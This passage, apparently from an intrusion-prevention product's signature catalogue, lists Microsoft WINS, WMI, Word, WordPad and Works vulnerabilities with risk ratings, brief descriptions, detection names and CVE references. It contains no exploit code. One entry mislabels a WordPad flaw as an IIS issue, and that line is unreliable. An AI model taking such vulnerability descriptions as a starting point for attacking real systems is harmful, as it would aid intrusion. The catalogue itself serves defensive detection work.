About this vulnerability: A vulnerability in Microsoft Windows' WINS service
Risk: Moderate
First detected in: sgpkg-ips-212-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 Server; Windows 2003; Windows 2008
Software: <os>
Type: Insecure Configuration
Description: There is a spoofing vulnerability in Microsoft Windows' WINS service. This vulnerability is due to a lack of validation of NetBIOS communication names during name registration with the WINS server. This vulnerability could allow a remote authenticated attacker to redirect Internet traffic to an attacker-controlled IP address, thereby allowing man-in-the-middle and spoofing attacks.
Situation: Generic_UDP-WINS-WPAD-Host-Name-Registration
References:
CVE-2009-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0094
BID-34013
http://www.securityfocus.com/bid/34013
OSVDB-52520
http://www.osvdb.org/52520
MS09-008
http://technet.microsoft.com/security/bulletin/MS09-008
Back to top

Microsoft-WINS-Service-Failed-Response-CVE-2011-1248

About this vulnerability: A vulnerability in Microsoft WINS Service
Risk: High
First detected in: sgpkg-ips-390-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003; Windows 2008; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows Name Service (WINS).
Situation: WINS_CS-Microsoft-WINS-Service-Failed-Response-CVE-2011-1248
References:
CVE-2011-1248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1248
BID-47730
http://www.securityfocus.com/bid/47730
OSVDB-72234
http://www.osvdb.org/72234
MS11-035
http://technet.microsoft.com/security/bulletin/MS11-035
Back to top

Microsoft-WMI-Administrative-Tools-ActiveX-Control

About this vulnerability: A vulnerability in Microsoft WMI Administrative Tools
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft WMI Administrative Tools
Type: Malfunction
Description: Multiple vulnerabilities have been reported in Microsoft Windows Management Instrumentation (WMI) Administrative Tools that could be exploited by remote attackers to compromise a vulnerable user's system. The vulnerabilities are due to the way "AddContextRef()" and "ReleaseContext()" methods of the WMI Object Viewer control improperly handle the "lCtxHandle" parameter. Remote, unauthenticated attackers could exploit this vulnerability by enticing an unsuspecting user to process a malicious web page. This can lead to code execution on their system under the context of the affected application.
Situation: HTTP_SS-Microsoft-WMI-Administrative-Tools-ActiveX-Control
File-Text_Microsoft-WMI-Administrative-Tools-ActiveX-Control
References:
CVE-2010-3973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3973
BID-45546
http://www.securityfocus.com/bid/45546
MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027
Back to top

Microsoft-WMITools-ActiveX-Control-CVE-2010-3973

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Internet Explorer
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
File-Text_Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
References:
CVE-2010-3973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3973
BID-45546
http://www.securityfocus.com/bid/45546
MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027
Back to top

Microsoft-WMP-CVE-2010-2745

About this vulnerability: A Windows Media Player vulnerability
Risk: High
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Malfunction
Description: A vulnerability exists in Windows Media Player.
Situation: HTTP_SS-WMP-2-CVE-2010-2745
HTTP_SS-WMP-1-CVE-2010-2745
File-Text_Microsoft-Windows-Media-Player-1-CVE-2010-2745
File-Text_Microsoft-Windows-Media-Player-2-CVE-2010-2745
References:
CVE-2010-2745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2745
MS10-082
http://technet.microsoft.com/security/bulletin/MS10-082
Back to top

Microsoft-Word-Crafted-Smarttag-Record-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office Word
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Word. The vulnerability is due to a memory handling error while handling MS Word smart tags. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Microsoft Word document, potentially causing arbitrary code to be injected and executed in the security context of the currently logged in user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of the attack attempt. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: File-OLE_Microsoft-Word-Crafted-Smarttag-Record-Code-Execution
References:
CVE-2008-2244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2244
BID-30124
http://www.securityfocus.com/bid/30124
MS08-042
http://technet.microsoft.com/security/bulletin/MS08-042
Back to top

Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow

About this vulnerability: Microsoft Word dpcallout RTF Control Word Handling Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists a buffer overflow vulnerability in Microsoft Word products. The flaw is due to an logic error when processing RTF documents that contain unexpected control words following a dpcallout control word. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.
Situation: HTTP_SS-Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
File-RTF_Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
References:
CVE-2008-4028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4028
BID-32585
http://www.securityfocus.com/bid/32585
MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072
Back to top

Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow

About this vulnerability: An integer overflow vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Word; Microsoft Outlook; Microsoft Word Viewer; Microsoft Works
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Microsoft Word. The product incorrectly processes Rich Text Format (RTF) files that contain polygon or polyline drawing objects with a large number of points, resulting in an integer overflow. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file or an RTF-formatted email using the affected applications. A successful exploitation can lead to arbitrary code execution in the security context of the affected user.
Situation: HTTP_SS-Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow
File-RTF_Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Overflow
References:
CVE-2008-4025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4025
MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072
Back to top

Microsoft-Word-Fcplcffldmom-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-688-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in Microsoft Word.
Situation: File-OLE_Microsoft-Word-Fcplcffldmom-Memory-Corruption
References:
CVE-2015-2477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2477
MS15-081
http://technet.microsoft.com/security/bulletin/MS15-081
Back to top

Microsoft-Word-File-Information-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word; Microsoft Word Viewer
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Word.
Situation: HTTP_SS-Microsoft-Word-File-Information-Memory-Corruption-MS09-068
References:
CVE-2009-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2135
BID-35437
http://www.securityfocus.com/bid/35437
OSVDB-55232
http://www.osvdb.org/55232
OSVDB-55231
http://www.osvdb.org/55231
MS09-068
http://technet.microsoft.com/security/bulletin/MS09-068
Back to top

Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716

About this vulnerability: A vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-1563-5242
Last changed: sgpkg-ips-1568-5242
Platform: Windows
Software: Microsoft Word
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in Microsoft Word. The vulnerability is due to insufficient validation of RTF files with a large number of fonts defined in the font table. A remote attacker could exploit the vulnerability by enticing a user to open a specially crafted RTF document. Successful exploitation could result in the execution of arbitrary code in the security context of the target user.
Situation: File-RTF_Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716
References:
CVE-2023-21716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21716
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
Back to top

Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write

About this vulnerability: A vulnerability in Microsoft Word.
Risk: High
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1441-5242
Platform: Generic
Software: Microsoft Word
Type: Malfunction
Description: A vulnerability in Microsoft Word and Microsoft Office, Microsoft 365 Apps for Enterprise, Office 2019, Office 2019 for Mac, which allows remote attackers to execute arbitrary code on the target system by enticing the user to open a specially crafted document, due to the improper validation on user-supplied data while parsing GLB files.
Situation: File-Binary_Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write
References:
CVE-2021-34478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478
Back to top

Microsoft-Word-Global-Array-Index-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: There is a buffer overflow vulnerability in Microsoft Word. The flaw is due to an index error when processing DOC document that contains a crafted TextFlow record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted DOC file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-OLE_Microsoft-Word-Global-Array-Index-Heap-Overflow
References:
CVE-2008-4026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4026
BID-32583
http://www.securityfocus.com/bid/32583
MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072
Back to top

Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903

About this vulnerability: A memory corruption vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-329-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft Word.
Situation: E-Mail_BS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
HTTP_SS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
File-OLE_Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
References:
CVE-2010-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1903
MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056
Back to top

Microsoft-Word-Malformed-Index-Code-Execution

About this vulnerability: There exists a code execution vulnerability in Microsoft Word.
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Word.
Situation: File-OLE_Microsoft-Word-Malformed-Index-Code-Execution
References:
CVE-2010-2750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2750
BID-43766
http://www.securityfocus.com/bid/43766
MS10-079
http://technet.microsoft.com/security/bulletin/MS10-079
Back to top

Microsoft-Word-Malformed-String-Memory-Corruption

About this vulnerability: A buffer overflow vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Word; Microsoft Office
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Word processes. The vulnerability is a result of insufficient boundary checking while parsing a font table structure in a specially crafted file. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Word document, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_Microsoft-Word-For-Macintosh-Version-5-Document
File-Binary_Microsoft-Word-For-Macintosh-Version-5-Document
References:
CVE-2007-3899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3899
BID-25906
http://www.securityfocus.com/bid/25906
MS07-060
http://technet.microsoft.com/security/bulletin/MS07-060
Back to top

Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: There exists a memory corruption vulnerability in the dynamically-linked library mso.dll which is shipped with Microsoft Word. The flaw is caused by an improper check when processing data in Microsoft Word documents. An attacker may exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Word application will terminate. This can potentially lead to loss of data contained in the documents. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. The affected application would also most likely stop functioning as a result of such an attack.
Situation: File-OLE_Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption
Back to top

Microsoft-Word-RCE-Vulnerability-CVE-2015-0097

About this vulnerability: A vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Word
Type: Malfunction
Description: A vulnerability in Microsoft Word
Situation: File-OLE_Microsoft-Word-RCE-Vulnerability-CVE-2015-0097
References:
CVE-2015-0097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0097
MS15-022
http://technet.microsoft.com/security/bulletin/MS15-022
Back to top

Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Word detected
Risk: High
First detected in: sgpkg-ips-1691-5242
Last changed: sgpkg-ips-1691-5242
Platform: Generic
Software: Microsoft Word
Type: Malfunction
Description: A remote code execution vulnerability has been reported for Microsoft Word.
Situation: File-PDF_Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379
References:
CVE-2024-21379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21379
ms24-feb
http://technet.microsoft.com/security/bulletin/ms24-feb
Back to top

Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Buffer Overflow
Description: A heap buffer overflow in Microsoft Office can be exploited by a crafted RTF file with an embedded bitmap image. A successful attack allows arbitrary code execution on the target machine.
Situation: File-RTF_Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow
References:
CVE-2016-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0010
MS16-004
http://technet.microsoft.com/security/bulletin/MS16-004
Back to top

Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Word RTF Drawing Object Parsing
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: A vulnerability in Microsoft Word RTF Drawing Object Parsing allows attackers to execute arbitrary code
Situation: HTTP_SS-Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
File-RTF_Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
References:
CVE-2008-1091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1091
BID-29104
http://www.securityfocus.com/bid/29104
MS08-026
http://technet.microsoft.com/security/bulletin/MS08-026
Back to top

Microsoft-Word-RTF-Mismatch-CVE-2012-0183

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word 2003; Microsoft Word 2007; Microsoft Office 2011; Microsoft Office Compatibility Pack
Type: Malfunction
Description: There is a vulnerability in Microsoft Word.
Situation: File-RTF_Microsoft-Word-RTF-Mismatch-CVE-2012-0183
References:
CVE-2012-0183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0183
BID-53344
http://www.securityfocus.com/bid/53344
MS12-029
http://technet.microsoft.com/security/bulletin/MS12-029
Back to top

Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902

About this vulnerability: A memory corruption vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft Word.
Situation: E-Mail_BS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
HTTP_SS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
File-RTF_Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
References:
CVE-2010-1902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1902
MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056
Back to top

Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901

About this vulnerability: A memory corruption vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Word.
Situation: E-Mail_BS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
HTTP_SS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
File-RTF_Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
References:
CVE-2010-1901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1901
MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056
Back to top

Microsoft-Word-RTF-Parsing-Stack-Exhaustion

About this vulnerability: A RTF parsing denial of service vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Misconfiguration
Description: A vulnerability exists in Microsoft Word allowing an attacker to cause denial of service via malformed tables.
Situation: SMTP_Microsoft-Word-RTF-Parsing-Stack-Exhaustion
File-RTF_Microsoft-Word-RTF-Parsing-Stack-Exhaustion
Back to top

Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word; Microsoft Word 2003; Microsoft Word 2007; Microsoft Word 2010; Microsoft Word 2013
Type: Malfunction
Description: There is a remote code execution in Microsoft Word 2010 related to parsing RTF files.
Situation: File-Text_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
File-Text_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-RTF_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-RTF_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
References:
CVE-2014-1761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1761
BID-66385
http://www.securityfocus.com/bid/66385
OSVDB-104895
http://www.osvdb.org/104895
Back to top

Microsoft-Word-RTF-RTF-Object-Parsing-Memory-Corruption

About this vulnerability: A RTF parsing memory corruption vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Misconfiguration
Description: A vulnerability exists in Microsoft Word allowing an attacker to cause memory corruption via maliciously crafted RTF files.
Situation: File-RTF_Microsoft-Word-RTF-Object-Parsing-Memory-Corruption
References:
CVE-2008-4027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4027
MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072
Back to top

Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033

About this vulnerability: A vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: A security feature bypass vulnerability has been reported in Microsoft Word.
Situation: File-Text_Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033
References:
CVE-2024-49033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49033
ms24-nov
http://technet.microsoft.com/security/bulletin/ms24-nov
Back to top

Microsoft-Word-Sprmsdyatop-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Word detected
Situation: File-OLE_Microsoft-Word-Sprmsdyatop-Memory-Corruption
References:
CVE-2016-3316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3316
MS16-099
http://technet.microsoft.com/security/bulletin/MS16-099
Back to top

Microsoft-Word-Use-After-Free-CVE-2011-1983

About this vulnerability: A vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2011
Type: Malfunction
Description: There is a vulnerability in Microsoft Word.
Situation: File-TextId_Microsoft-Word-Use-After-Free-CVE-2011-1983
References:
CVE-2011-1983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1983
BID-50956
http://www.securityfocus.com/bid/50956
OSVDB-77659
http://www.osvdb.org/77659
MS11-089
http://technet.microsoft.com/security/bulletin/MS11-089
Back to top

Microsoft-WordPad-Embedded-COM-Code-Execution

About this vulnerability: Vulnerable COM-object in WordPad document
Risk: Moderate
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WordPad
Type: Code Injection
Description: A vulnerability exists in Microsoft WordPad allowing an attacker to cause execute arbitrary code via maliciously embedded COM-objects.
Situation: File-RTF_Microsoft-WordPad-Embedded-COM-Code-Execution
Back to top

Microsoft-WordPad-Text-Converter-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft WordPad
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WordPad
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft WordPad. The vulnerability is due to an error while WordPad Text Converter processes data in a specially crafted Word 97 document. Remote attackers can exploit this vulnerability by enticing a target user to open a malicious Word 97 document, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behavior of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: HTTP_SS-Microsoft-WordPad-Text-Converter-Buffer-Overflow
File-OLE_Microsoft-WordPad-Text-Converter-Buffer-Overflow
References:
CVE-2010-2563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2563
BID-43122
http://www.securityfocus.com/bid/43122
MS10-067
http://technet.microsoft.com/security/bulletin/MS10-067
Back to top

Microsoft-WordPad-Text-Converter-CVE-2010-2563

About this vulnerability: A vulnerability in Microsoft WordPad
Risk: High
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003
Software: WordPad
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Information Services (IIS).
Situation: HTTP_SS-Microsoft-WordPad-Text-Converter-CVE-2010-2563
File-OLE_Microsoft-WordPad-Text-Converter-CVE-2010-2563
References:
CVE-2010-2563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2563
MS10-067
http://technet.microsoft.com/security/bulletin/MS10-067
Back to top

Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Word 8 converter shipped with the Microsoft Windows family of operating systems. The flaw is due to a boundary error when processing a crafted Word document file. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted Word 97 document with an affected version of WordPad. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-OLE_Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow
References:
CVE-2008-4841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4841
BID-32718
http://www.securityfocus.com/bid/32718
MS09-010
http://technet.microsoft.com/security/bulletin/MS09-010
Back to top

Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Works
Type: Buffer Overflow
Description: There is a vulnerability in the WordPerfect 5.x converter module used by several Microsoft products. The vulnerability is triggered by a WordPerfect document with an overly long length field. This vulnerability could permit an attacker to inject and execute code on a remote system with the security context of the current user. In a simple attack against this vulnerability, the application that uses the vulnerable data converter will terminate on a memory access violation error. In most cases the &quot;Program error&quot; popup dialog will be displayed saying that the application has generated errors and will be closed by Windows. However, depending on the actual error and the application targeted, the application may terminate without user notification. In case of a more sophisticated attack against this vulnerability, arbitrary code may be injected into the application and executed. In this case, the behaviour of the attack target will depend on the nature of the injected code.
Situation: File-Binary_Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow
References:
CVE-2004-0573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0573
BID-11172
http://www.securityfocus.com/bid/11172
MS04-027
http://technet.microsoft.com/security/bulletin/MS04-027
Back to top

Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow

About this vulnerability: A stack overflow vulnerability in Microsoft Works
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Works
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Works. In particular, a file converter handling WPS files does not perform sufficient validation of the various fields in the input file. A remote attacker can exploit this vulnerability by enticing the target user to open maliciously constructed files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.
Situation: HTTP_SS-Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
File-OLE_Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
References:
CVE-2008-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0108
BID-27659
http://www.securityfocus.com/bid/27659
MS08-011
http://technet.microsoft.com/security/bulletin/MS08-011
Back to top

Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Works
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Microsoft Works File Converter. The vulnerability is due to insufficient input validation of section header index table while handling WPS files. A remote attacker can exploit this vulnerability by enticing the target user to open maliciously constructed files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.
Situation: HTTP_SS-Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
File-OLE_Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
References:
CVE-2008-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0105
BID-27658
http://www.securityfocus.com/bid/27658
MS08-011
http://technet.microsoft.com/security/bulletin/MS08-011
Back to top

Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Works
Type: Malfunction
Description: There exists a buffer overflow vulnerability in Microsoft Works File Converter. The vulnerability is due to improper validation of various lengths in WPS document. A remote attacker can exploit this vulnerability by enticing the target user to open a maliciously constructed WPS document, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.
